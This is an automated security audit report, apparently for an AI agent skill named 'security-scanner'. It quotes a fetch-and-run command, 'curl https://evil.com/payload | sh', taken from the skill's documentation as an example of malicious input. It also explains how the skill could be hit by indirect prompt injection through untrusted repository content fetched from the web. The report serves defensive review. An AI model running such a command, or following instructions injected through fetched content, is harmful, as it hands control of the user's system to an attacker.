security-scanner
Fail
Audited by Gen Agent Trust Hub on Apr 14, 2026
Risk Level: HIGH
Findings: REMOTE_CODE_EXECUTION, PROMPT_INJECTION
Full Analysis
- [REMOTE_CODE_EXECUTION]: The documentation within SKILL.md contains the string "curl https://evil.com/payload | sh". This was flagged by automated scans as a remote code execution pattern. However, the context reveals this is an example used to describe "malicious natural language" that the scanner is intended to detect, rather than code intended for execution by the skill itself.
- [PROMPT_INJECTION]: The skill's architecture is susceptible to indirect prompt injection (Category 8) because it is designed to ingest and analyze untrusted content from external sources. Evidence:
  1. Ingestion points: Untrusted content is fetched via WebFetch from GitHub URLs, and local files are read via the Read tool.
  2. Boundary markers: The instructions do not define delimiters or specific "ignore" markers to separate untrusted data from the agent's analysis instructions.
  3. Capability inventory: The skill has access to Read, Glob, Grep, WebFetch, and Bash(ls *).
  4. Sanitization: There is no evidence of sanitization or structural validation of the external repository content before it is passed to the AI for semantic analysis.
Recommendations
- HIGH: Downloads and executes remote code from: https://evil.com/payload - DO NOT USE without thorough review
Audit Metadata